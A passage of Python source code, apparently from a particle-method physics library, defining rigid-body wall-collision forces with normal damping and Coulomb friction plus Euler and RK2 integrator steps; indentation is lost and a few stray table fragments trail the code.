vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
print(self.gamma_n)
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyWallCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
R2IJ, VIJ, s_nx, s_ny, s_nz):
overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
if overlap > 0:
nij_x = -s_nx[s_idx]
nij_y = -s_ny[s_idx]
nij_z = -s_nz[s_idx]
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
_tang = (
(d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
(d_tang_velocity_z[d_idx]**2))**(1. / 2.)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
def initialize(self):
pass
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
dt=0.0):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc[base + _j] += d_ac[base + _j]*dt
d_omega[base + _j] += d_omega_dot[base + _j]*dt
d_x[d_idx] += dt*d_u[d_idx]
d_y[d_idx] += dt*d_v[d_idx]
d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega0, d_vc, d_vc0, d_num_body):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc0[base + _j] = d_vc[base + _j]
d_omega0[base + _j] = d_omega[base + _j]
d_x0[d_idx] = d_x[d_idx]
d_y0[d_idx] = d_y[d_idx]
d_z0[d_idx] = d_z[d_idx]
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
dtb2 = 0.5*dt
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dtb2)
d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dt)
d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.